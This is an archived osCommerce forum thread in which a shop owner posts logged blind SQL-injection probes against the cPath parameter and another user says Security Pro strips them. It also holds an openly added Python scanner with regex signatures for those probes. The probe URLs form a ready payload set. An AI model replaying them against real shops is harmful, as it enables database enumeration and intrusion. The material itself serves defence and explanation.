osCommerce

Under attack - is my database ok?


tigergirl


Wow,

got a shock when I saw this in who's online:

 

/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E60%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E88%20and%201=1
/index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3C=32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E144%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(@@tmpdir)%20%20)=32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(@@datadir)%20%20)%3E144%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(@@basedir)%20%20)=32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(current_user())%20%20)%3E39%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(session_user())%20%20)%3C=32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(user())%20%20)%3E32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(version())%20%20)=32%20and%201=1
/index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615e5e5e,0x5e5e5e6161615
/index.php?cPath=31%20and%20(select%20char_length(version())%20%20)%3E144%20and%201=1
/index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1
/index.php?cPath=31%20and%20(select%20char_length(database())%20%20)=32%20and%201=1
/index.php?cPath=31%20/*!49999%20and%201=2*/--
/index.php?cPath=31%20and%201=2%20union%20select%201--
/index.php?cPath=31%20and%201=2%20union%20select%20char(97,98,97,98,97,97,97,98,98,98,97,99,97)--
/index.php?cPath=31%20and%201=2%20union%20select%200x5e5e5e6161615e5e5e/*%20and%201=1

 

And there were a lot more entries than that. What are they trying to do, though? Security Pro is sanitizing this, isn't it? Or should I be worried? IP trap is going on my priority list, and I think it's the only thing I haven't implemented from the stickied security topic.

I'm feeling lucky today......maybe someone will answer my post!

I do try and answer a simple post when I can just to give something back.

------------------------------------------------

PM me? - I'm not for hire


Every one of those injection attacks uses illegal characters that would be stripped by security pro.
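Added example, not from the thread and not Security Pro's code: a small Python scanner that takes request lines like the ones quoted above, URL-decodes the cPath value, and flags the patterns that make them recognisable as probes (the `and 1=1` / `and 1=2` pairs of boolean-based blind injection, `mysql.user` and `@@datadir` fingerprinting, `union select`, the `/*!49999 ... */` MySQL version-comment trick, and trailing `--` comment truncation). It also contrasts what a character-stripping filter, the approach the reply describes, leaves of such a value with a strict whitelist on the digit/underscore shape an osCommerce cPath actually takes (`31`, `22_31`). The sample request list is constructed from the post; the signature labels, function names and the regular expressions are this example's own assumptions, not Security Pro's implementation.

```python
"""Added example: spot the blind SQL-injection probes from the post in request
lines, and show why cPath is harmless once it is restricted to the shape
osCommerce expects. Not Security Pro's code; names are this example's own."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: two benign requests plus four request lines copied from the post.
SAMPLE_REQUESTS = [
    "/index.php?cPath=31",
    "/index.php?cPath=22_31",
    "/index.php?cPath=31%20and%20(select%20char_length(count(*))%20from%20mysql.user%20)%3E60%20and%201=1",
    "/index.php?cPath=31%20and%20(select%20ascii(substr(@@datadir,%201,%201)))=47%20and%201=1",
    "/index.php?cPath=31%20/*!49999%20and%201=2*/--",
    "/index.php?cPath=31%20and%201=2%20union%20select%20char(97,98,97,98,97,97,97,98,98,98,97,99,97)--",
]

# Signatures are matched against the URL-decoded, lower-cased parameter value.
# Labels are this example's own names for what each pattern indicates.
PROBE_SIGNATURES = [
    ("union-based extraction", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("system-table enumeration", re.compile(r"\bmysql\.user\b|\binformation_schema\b")),
    ("server-variable fingerprint",
     re.compile(r"@@(datadir|basedir|tmpdir|version)\b"
                r"|\b(version|database|current_user|session_user|user)\(\)")),
    ("boolean blind condition", re.compile(r"\band\s+\d+\s*=\s*\d+\b")),
    ("mysql version-comment evasion", re.compile(r"/\*!\d*")),
    ("comment truncation", re.compile(r"--\s*$|/\*\s*$")),
]

# An osCommerce cPath is one or more category ids joined by '_', e.g. '31' or '22_31'.
CPATH_OK = re.compile(r"^\d+(_\d+)*$")


def decode_param(request_path, name="cPath"):
    """Return the URL-decoded value of one query parameter ('' if absent)."""
    values = parse_qs(urlsplit(request_path).query, keep_blank_values=True).get(name, [])
    return values[0] if values else ""


def is_valid_cpath(value):
    """Strict whitelist: accept only the digit/underscore shape, reject everything else."""
    return CPATH_OK.match(value) is not None


def strip_illegal(value):
    """What a character-stripping filter leaves of the value: every non-digit,
    non-underscore character is dropped, so no SQL syntax can survive."""
    return re.sub(r"[^0-9_]", "", value)


def classify(request_path):
    """Describe one request line: decoded cPath, whether it passes the
    whitelist, and which probe patterns it matches."""
    value = decode_param(request_path)
    lowered = value.lower()
    return {
        "path": request_path,
        "cpath": value,
        "valid": is_valid_cpath(value),
        "probes": [label for label, pattern in PROBE_SIGNATURES if pattern.search(lowered)],
    }


def scan(request_paths):
    """Classify every request line in order."""
    return [classify(p) for p in request_paths]


def count_probes(request_paths):
    """Number of request lines that matched at least one probe signature."""
    return sum(1 for row in scan(request_paths) if row["probes"])


if __name__ == "__main__":
    for row in scan(SAMPLE_REQUESTS):
        tag = "PROBE" if row["probes"] else "ok   "
        print(f"{tag} valid={row['valid']!s:5} cPath={row['cpath']!r}")
        for label in row["probes"]:
            print(f"        - {label}")
    # The stripping filter turns a probe into a harmless but meaningless id:
    print("stripped:", strip_illegal(decode_param(SAMPLE_REQUESTS[2])))  # 31_6011
```

Two things worth noticing when you run it. First, every injected line carries an `and 1=1` or `and 1=2` tail: the sender is not expecting an error message, only a normal page versus an empty one, and reads one true/false answer per request from that difference, which is why a shop that never shows SQL errors still needs the parameter checked. Second, stripping illegal characters does neutralise the SQL (nothing but digits and underscores survives), but the first probe above becomes `31_6011`, a well-formed id for a category that does not exist, so the request is served as a different, possibly empty, category page. Rejecting a value that fails the whitelist, or casting each `_`-separated id to an integer before it reaches the query, gives the same protection with a predictable result.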


OK, well, I sure am glad you made such a fantastic mod and that I installed it ages ago! I haven't had a single problem with it at all.....

 

Thanks Rob. :D


Archived

This topic is now archived and is closed to further replies.
